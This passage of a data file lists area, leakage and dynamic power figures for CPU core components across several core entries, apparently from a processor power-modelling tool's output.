'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.692681,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.122718,
'Execution Unit/Instruction Scheduler/Area': 2.17927,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.328073,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.00115349,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.20978,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.367774,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.017004,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00962066,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00730101,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 1.00996,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00529112,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 2.07911,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.636852,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0800117,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0455351,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 4.84781,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.841232,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.000856399,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.55892,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.365253,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.0178624,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00897339,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 1.36988,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.114878,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.0641291,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.257333,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 6.5717,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.130862,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0133321,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.135642,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0985991,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.266504,
'Execution Unit/Register Files/Runtime Dynamic': 0.111931,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0442632,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00607074,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.358853,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.918468,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.0920413,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0345155,
'Execution Unit/Runtime Dynamic': 3.09747,
'Execution Unit/Subthreshold Leakage': 1.83518,
'Execution Unit/Subthreshold Leakage with power gating': 0.709678,
'Gate Leakage': 0.372997,
'Instruction Fetch Unit/Area': 5.86007,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00133722,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00133722,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00117013,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000455941,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00141638,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00526096,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0126276,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0590479,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0947859,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 6.02919,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.266465,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.321935,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 8.54479,
'Instruction Fetch Unit/Runtime Dynamic': 0.701075,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932587,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.408542,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0784516,
'L2/Runtime Dynamic': 0.0170574,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80969,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 4.87526,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.76986,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0351387,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.117703,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.117702,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 5.43334,
'Load Store Unit/Runtime Dynamic': 2.46803,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.290234,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.580469,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591622,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283406,
'Memory Management Unit/Area': 0.434579,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.103005,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.104066,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00813591,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.374873,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0440318,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.711448,
'Memory Management Unit/Runtime Dynamic': 0.148097,
'Memory Management Unit/Subthreshold Leakage': 0.0769113,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0399462,
'Peak Dynamic': 25.9014,
'Renaming Unit/Area': 0.369768,
'Renaming Unit/FP Front End RAT/Area': 0.168486,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00489731,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 3.33511,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.456548,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0437281,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.024925,
'Renaming Unit/Free List/Area': 0.0414755,
'Renaming Unit/Free List/Gate Leakage': 4.15911e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0401324,
'Renaming Unit/Free List/Runtime Dynamic': 0.0242997,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000670426,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000377987,
'Renaming Unit/Gate Leakage': 0.00863632,
'Renaming Unit/Int Front End RAT/Area': 0.114751,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.00038343,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.86945,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.182883,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00611897,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00348781,
'Renaming Unit/Peak Dynamic': 4.56169,
'Renaming Unit/Runtime Dynamic': 0.663731,
'Renaming Unit/Subthreshold Leakage': 0.070483,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0362779,
'Runtime Dynamic': 7.09547,
'Subthreshold Leakage': 6.21877,
'Subthreshold Leakage with power gating': 2.58311},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0503463,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.242233,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.298709,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.15454,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.249267,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.125822,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.529629,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.130953,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.59001,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0564325,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00648211,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.064632,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0479391,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.121065,
'Execution Unit/Register Files/Runtime Dynamic': 0.0544213,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.148751,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.372135,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.6038,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.000917974,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.000917974,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000825619,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000333866,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00068865,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00335022,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00787022,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0460851,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 2.93141,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.133269,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.156526,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 5.29219,
'Instruction Fetch Unit/Runtime Dynamic': 0.3471,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0366939,
'L2/Runtime Dynamic': 0.00763293,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.89071,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.805089,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0534977,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0534978,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 3.14334,
'Load Store Unit/Runtime Dynamic': 1.12242,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.131916,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.263833,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0468175,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0473088,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.182264,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0220249,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.418797,
'Memory Management Unit/Runtime Dynamic': 0.0693337,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 17.0705,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.148448,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.008779,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0758336,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.23306,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 3.38334,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0542242,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.245279,
